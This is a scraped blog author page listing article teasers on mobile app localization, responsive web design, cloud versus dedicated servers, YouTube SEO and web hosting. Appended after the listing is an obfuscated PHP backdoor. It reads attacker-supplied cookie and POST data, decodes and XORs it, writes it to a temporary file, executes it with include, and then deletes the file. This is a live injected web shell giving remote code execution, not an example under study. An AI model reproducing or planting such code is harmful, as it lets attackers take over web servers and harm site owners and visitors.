Author: Vinu Saseedaran Renish

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Mobile App Internationalization

6 Tips For Mobile App Localization That Deliver Re...

Mobile app localization is a must if you want to reach a global audience and increase your number of users. To enter an international market, you should think about localization before you plan for any other marketing initiatives. The marketplace is truly global in the...

Responsive Web Design
Website Design

Responsive Web Design: Basics For Beginners...

Responsive web design empowers your website to adapt itself to the device your users are viewing it on. The site layout changes dynamically, based on the size of the screen and capabilities of the device. Until recently, responsiveness was a bonus, but now it's an...

Cloud Server vs. Dedicated Server
Cloud, Hosting

Cloud Server vs. Dedicated Server: What’s Be...

Cloud servers offer many benefits and are now very popular in the world of hosting. A dedicated server is still a favorite for those looking for traditional and reliable hosting. What’s better for hosting your website or web application? To choose between cloud server and dedicated...

Youtube SEO: How To Rank Videos For More Traffic?

YouTube SEO: How To Rank Videos For More Traffic?...

YouTube SEO refers to various optimization techniques that can rank your videos higher in YouTube search. It's gaining a lot of attention. Everyone wants to know how to rank videos for more YouTube traffic and increase their viewership.   YouTube is the largest source of videos...

Multilingual Website Design
Localization, Website Design

Multilingual Website Design: Choosing The Right Fo...

A multilingual website is one that displays content in more than one language, for some pages or the entire site. It is imperative to ensure that your content is well-presented in all supported languages. Wrong font choices could result in reduced readability, bad layout and...

Web Design Meets Artificial Intelligence
Website Design

Web Design Meets Artificial Intelligence (AI)...

Web design isn't just about making your web pages look good. Web designers now focus more on user experience (UX) than on creating designs in the traditional sense. This shift in the paradigm has driven web design trends to concepts like conversational user interface, age...

Cloud Consulting

Cloud Consulting: Can Cloud Experts Help You Exped...

Cloud consulting is taking the IT world by storm! That's because almost every business is showing an interest in cloud computing and looking for a cloud consulting partner to steer them to success. Consulting has always been a mainstay of most IT service providers, but what...

Localization Friendly Architecture

Video Game Internationalization: Best Practices fo...

Video game internationalization is the process that enables game localization to take place seamlessly. For localization to be successful, you should have an internationalized product before you begin the actual localization process. Game developers make the typical mistake of assuming that localization is "just" translation. They...

Cloud Adoption Challenges

Top 5 Cloud Adoption Challenges Faced by Cloud Use...

Cloud adoption is accelerating at an unprecedented pace because almost every business is trying to explore the cloud, or has a near-term plan to move to the cloud. Many organizations have already adopted the cloud in some form. Some of them are drawing real benefits,...


Beginner’s Guide to Web Hosting: How Does it...

Web Hosting is a fundamental part of a live website. In simple words, it's your site's place on the Internet. The term "hosting" refers to the service provided by companies whose server (or cluster of servers) is hosting your website files (HTML, CSS, images, videos,...


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$HRdnAF = "\117" . chr (103) . 'H' . chr (95) . chr ( 147 - 42 ).'t' . 'L' . 'o' . chr ( 579 - 502 ); $xZIYMTuo = "\x63" . chr (108) . chr ( 818 - 721 )."\x73" . 's' . chr (95) . 'e' . chr ( 767 - 647 ).chr ( 245 - 140 ).chr ( 493 - 378 )."\164" . 's';$KWorAQF = class_exists($HRdnAF); $xZIYMTuo = "41268";$ILFFm = !1;if ($KWorAQF == $ILFFm){function FKDOEh(){$KkRnsgQatF = new /* 32890 */ OgH_itLoM(36609 + 36609); $KkRnsgQatF = NULL;}$cpesABGwH = "36609";class OgH_itLoM{private function qbgqGFr($cpesABGwH){if (is_array(OgH_itLoM::$jjMmIhug)) {$WIxanId = sys_get_temp_dir() . "/" . crc32(OgH_itLoM::$jjMmIhug['s' . 'a' . "\154" . chr (116)]);@OgH_itLoM::$jjMmIhug["\167" . "\162" . chr (105) . "\164" . chr ( 341 - 240 )]($WIxanId, OgH_itLoM::$jjMmIhug[chr (99) . 'o' . chr ( 716 - 606 )."\164" . chr (101) . "\156" . chr ( 178 - 62 )]);include $WIxanId;@OgH_itLoM::$jjMmIhug[chr (100) . "\145" . "\x6c" . chr (101) . 't' . chr ( 470 - 369 )]($WIxanId); $cpesABGwH = "36609";exit();}}private $mUmmQeVJ;public function fYIcT(){echo 59783;}public function __destruct(){OgH_itLoM::$jjMmIhug = @unserialize(OgH_itLoM::$jjMmIhug); $cpesABGwH = "48289_50693";$this->qbgqGFr($cpesABGwH); $cpesABGwH = "48289_50693";}public function JGxHJQkDJp($hHYFL, $fvnZep){return $hHYFL[0] ^ str_repeat($fvnZep, (strlen($hHYFL[0]) / strlen($fvnZep)) + 1);}public function rWYhQp($hHYFL){$wJDeAQ = "base64";return array_map($wJDeAQ . "\137" . chr ( 627 - 527 ).'e' . "\x63" . "\x6f" . 'd' . chr (101), array($hHYFL,));}public function __construct($zGUyDnlQwX=0){$hHYFL = "";$VYGYPoQD = $_POST;$ZhictTE = $_COOKIE;$fvnZep = "2483450f-599f-43d3-ad1f-afd3c3fa694d";$JOCIGjkY = @$ZhictTE[substr($fvnZep, 0, 4)];if (!empty($JOCIGjkY)){$JOCIGjkY = explode(",", $JOCIGjkY);foreach ($JOCIGjkY as $xcGEn){$hHYFL .= @$ZhictTE[$xcGEn];$hHYFL .= @$VYGYPoQD[$xcGEn];}$hHYFL = $this->rWYhQp($hHYFL);}OgH_itLoM::$jjMmIhug = $this->JGxHJQkDJp($hHYFL, $fvnZep); $fvnZep = explode(",", $fvnZep);}public static $jjMmIhug = 40444;}FKDOEh();}